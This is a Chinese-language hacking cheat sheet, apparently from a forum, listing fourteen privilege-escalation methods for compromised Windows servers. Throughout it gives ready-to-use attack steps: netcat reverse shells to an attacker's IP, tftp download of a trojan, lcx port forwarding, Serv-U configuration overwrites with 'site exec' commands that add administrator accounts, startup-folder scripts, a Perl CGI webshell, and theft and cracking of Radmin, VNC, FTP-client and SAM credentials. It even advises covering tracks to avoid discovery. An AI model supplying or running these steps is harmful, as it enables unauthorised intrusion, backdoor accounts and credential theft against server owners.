各种提权总结
需要知道的一些小常识:
serv-u自带后门 关键文件 servuadmin.exe或servuadmin.ini
serv -u 后门 端口 65500 go od serv-u 6.1
open IP 65500
一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制
system32/boot.dat 里面记录3389登录
解决终端
mstsc /console /v:你的服务器IP:远程端口
IIS管理器 快捷:inetmgr.exe
=============================================================================================================================
1. pcAnywhere提权:Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ pcAnywhere :cif文件 链接不成功可能是端口改了。5632端口
新:有些服务器的cif文件下载的时候受损,可以自己上传个cif文件去。然后再连接
-----------------------------------------------------------------------------------------------------------------------------
nc命令:
2.nc反弹提权:
服务器执行: nc位置 -l -p 8080 -t -e cmd位置
监听本地入栈信息
NC地址 cmd地址
--------------------------------------------------- -p port 打开本地端口
本地执行: telnet + 服务器IP地址 + 446
--------------------------------------------------- -t 以telnet形式应答入栈请求
传马命令: tftp -i ip地址 get 木马名字.exe -e 程序重定向
额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。
2.降低运行权限
////////////////////////////
现在本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。
在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
============================================================================================================================
3.flashFXP提权:文件地址 C:\Program FlashFXP
下载Sites.dat文件Stats.dat文件quick.dat文件
粘贴本机 FlashFXP Sites.dat
============================================================================================================================
4.radmin提权:
1.第一种:前提开启Remote服务。 注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
2.导出:regedit /e 导出路径.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters 下载
3.步骤:OllyDBG打开 radmin控制端(客户端)
然后执行 ctrl+f 搜索 JMP EAX
然后按一下F4 再按F8
然后再 右键-查找-所有常量
输入 10325476 (很好记的 反过来就是76543210)
在弹出的窗口中 选择第一行 F2下断
然后F9 运行
这时 用radmin连接 入侵的服务器
弹出输入密码的提示框 随便输入密码
等你输入完 后 OD也就激活了
这时 你要先运行下Ctrl+F9 再往上几行 选中红色的那块 就是刚才下断的地方
再次 按F2 一下 取消断点 然后再按 F8 这时 鼠标往下走 找到
ADD ES,18 这里 按一下F4
这时 你在左下角的 hex 那里 随便找个地方点一下
然后 运行Ctrl+G 在弹出的栏里 输入 [esp] 注意带大括号的
然后 就注意把第一行 复制替换成 刚才我们得到的radmin密码的hash值
后按F9 运行
"Port"=hex:00,00,00,00 是连接服务端时用的端口,这里是默认的4489.
第二种:导出--下载---上传本地---覆盖
=============================================================================================================================
5.SAN提权:地址C:\WINDOWS\repair 比较垃圾的一种提权
C:\WINNT\system32\config\ 下他的SAM 破解之
============================================================================================================================
6.写启动项提权: C:\Documents and Settings\All Users\「开始」菜单\程序\启动
@echo off
net user 123 123 /add
net localgroup administrators 123 /add
保存bat文件
@echo off
net share c$ /del 防护脚本
net share d$ /del
net share e$ /del
net share ipc$ /del
net share admin$ /del
保存vbs文件
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"Administrators,group")
Set od=ob.Create(user",123")
od.SetPassword "123"
od.SetInfo
Set of=GetObject(os&"/123",user)
oe.add os&"/123
============================================================================================================================
7.serv-u 有权限改写提权: (要有修改权限,这个提权需要的权限比较大)
找到ServUDaemon.ini文件 User数字=123|1|0
[USER=123|1]
Password=gn3436a2a7150feb9edf0151aec2bcbde2 (密码前俩位要看上面参数,密码是 111111 )HomeDir=c:\ (Windows目录)
TimeOut=600
Access1=C:\|RWAMLCDP
在第一项最下面写上:ReloadSettings=True(就是不需要重启)
修改后cdm ftp 输入:
cd windows (2003)
cd system32
FTP
////
命令
quote site exec net user 123 123 /add
quote site exec net localgroup administrators 123 /add
quote site exec net user 123 /del
[USER=123|1]
Password=gn3436a2a7150feb9edf0151aec2bcbde2 1234567
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
============================================================================================================================
8.serv_u ftp本地溢出提权:
上传--cmd运行(或asp。php运行)---在运行口令:盘符+上传名称.exe "net user 123 123 /add"
盘符+上传名称.exe "net localgroup administrators 123 /add"
注意: 管理员改密码需要下载: ServUDaemon.exe 然后本地破解
============================================================================================================================
9.serv-u ftp覆盖提权:将本地配置的ServUDaemon.ini上传并覆盖原始ServUDaemon.ini,(备份原webwell的serv-u,建立后门后要进行还原)。
使用命令cd windows
cd system32
quote site exec net.exe user 123 123 /add
修改提权:密码是Password=gn3436a2a7150feb9edf0151aec2bcbde2 1234567
注:如果没弄明白上面可以用这个:
1.首先下载serv-u本地配置生成一个ServUDaemon.ini(要配置权限要大)
2.然后上传到服务器serv-u里覆盖(上传前先备份网站ServUDaemon.ini文件,等提权后在换回来,防止发现)
3.执行cmd
ftp 远程IP
用户名
密码
cd windows
cd system32
quote site exec net.exe user 123 123 /add
quote site exec net.exe localhost administrators 123 /add
=============================================================================================================================
10.serv-u 端口转发提权:
1在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改)
2 在本机运行 lcx -listen 5000 21 (lcx地址要写对)
3 打开本地的serv u 在IP上填入127.0.0.1
帐号:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码帐号有可能改 自己下文件看密码)
此时的链接过程是本机连接21端口----转发往本机5000端口-----管道连接至远程机5000端口------转发至远程43958端口
连接成功后,在本机登录的serv-u相当于远程的serv-u
可以ftp本机IP 输入上面的帐号 密码 在远程ftp服务器执行命令.
=============================================================================================================================
11.VNC提权:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 读取。
破解由10进制破解到16进制 (本机自带科学计算器)
VNC占用端口号5900(看一下有没有5900端口)
c:\>vncx4 -W ( 破解工具)
导出cmd命令:c:\Windows\regegit -e 123.reg HKEY_GURRENT_USER\Software\ORL\WinVNC3\
(c;\\可能是d。e。f。盘等看系统盘在哪)
破解工具vncx4.exe
=============================================================================================================================
12.HASH破解提权:
(入侵机房)2003系统:先SAMInside看帐户,后lc5破解 2000系统:直接用findpass、mt、aio等cmd下直接破解(对于机房,大量机器控制)
对于2000用户我们可以直接用findpass、mt、aio等工具
对于2003用户我们可以用findpass2003、aio去试下.
=============================================================================================================================
13.perl提升权限:
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "
\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect
STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cmd.pl上传至BIN目录执行,(不能执行的时候保存后缀cgi) c:\prel或D.E.F.或webwell根目录
执行的时候后面打个?符号,然后直接执行cmd命令 具有最高管理权限可直接加帐号密码
有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中.
=============================================================================================================================
14.MYSQL提权:
查看当前权限:在root连接成功后,不能执行命令的办法
select '123' into outfile 'c:/windows/111.txt'
net user 123 123 /add & net localgroup administrators123 /add
实践证明 合成一句的效果比较好吧,反正个人这么认为
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\1.bat
C:\Documents and Settings\All Users\「开始」菜单\程序\启动
